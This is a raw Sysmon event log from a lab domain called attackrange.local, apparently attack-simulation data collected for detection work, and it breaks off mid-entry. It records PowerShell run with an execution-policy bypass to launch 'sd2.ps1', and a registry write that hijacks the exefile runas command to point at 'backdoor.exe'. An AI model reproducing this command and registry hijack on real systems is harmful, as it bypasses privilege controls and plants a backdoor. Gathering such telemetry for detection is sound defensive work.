23542300x80000000000000001055531Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.354{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\sd2.ps1.lnkMD5=F162F5A3A8EA069EFE08946426F0949D,SHA256=3548E24A809395CF1715D89F4CC3F6DE8CCF1F0DE7425435E6710264AC524053,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055530Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:26.339{466BC892-F8F2-60EB-117E-00000000CF01}33128908C:\Windows\system32\conhost.exe{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055529Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.323{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F8F2-60EB-117E-00000000CF01}3312C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055528Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.322{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055527Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:26.322{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055526Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.322{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055525Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:26.322{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055524Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.321{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055523Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:26.321{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\windows.storage.dll+94c4a|C:\Windows\System32\windows.storage.dll+94a02|C:\Windows\System32\SHELL32.dll+3f98d|C:\Windows\System32\SHELL32.dll+3e526|C:\Windows\System32\SHELL32.dll+802b1|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0 154100x80000000000000001055522Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.298{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 
'C:\Temp\test\sd2.ps1'"C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x80000000000000001055521Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.119{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52CA32AECA2F5EDBD4DEF1FA1D574098,SHA256=D04AF8ED81CF7BEC025455B9D384CE69DA7CAE721DA652DEB471D9FC7874F715,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810859Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.272{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57497-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000810858Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.342{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F8F2-60EB-F479-00000000D001}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810857Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:26.342{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810856Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.342{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810855Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:26.342{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810854Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.342{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810853Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:26.342{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810852Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.342{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810851Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:26.342{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810850Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.342{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810849Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:26.342{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810848Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.342{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F8F2-60EB-F479-00000000D001}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810847Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.342{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F8F2-60EB-F479-00000000D001}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810846Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.327{0C1E0330-F8F2-60EB-F479-00000000D001}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001055573Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:27.777{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D9DB6E1F53F8D1D214C5D4D639E0827C,SHA256=866027F77D94D3C230B8210DA8F9583B4648AD6530E83B5241CDDA452275A208,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001055572Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:27.360{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C91343BCA0652712331093A64254542C,SHA256=7AD834BD2CC7F4765C1203DC5D03081339C8B1B83F9A34D38F7F4967D82EA37D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055571Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:27.360{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE54ECE28A24A22631FE7549C0D2D234,SHA256=2A0D41D9AF70D89878C02837274CFBC3F7BE4B614658BC3FE56E8969E48AC489,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055570Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:27.360{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A8A00A1462AA97FEA08A3EB09B7EC85C,SHA256=B261C5564D011786C0CFAA16353FC501C32C087218DD0C1380B3E957328F7612,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001055569Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:10:27.307{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112_Classes\exefile\shell\runas\command\IsolatedCommandc:\temp\test\backdoor.exe 354300x80000000000000001055568Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:18.724{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62009-false10.0.1.12-8000- 23542300x8000000000000000810890Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:27.935{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A7225B66C33C26AFC317B5DCC2694396,SHA256=24D6D70A2A1969490D129248002AA766FDDCBAF775853FC1BAE3383202640535,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810889Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:27.795{0C1E0330-F8F3-60EB-F679-00000000D001}3548136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program 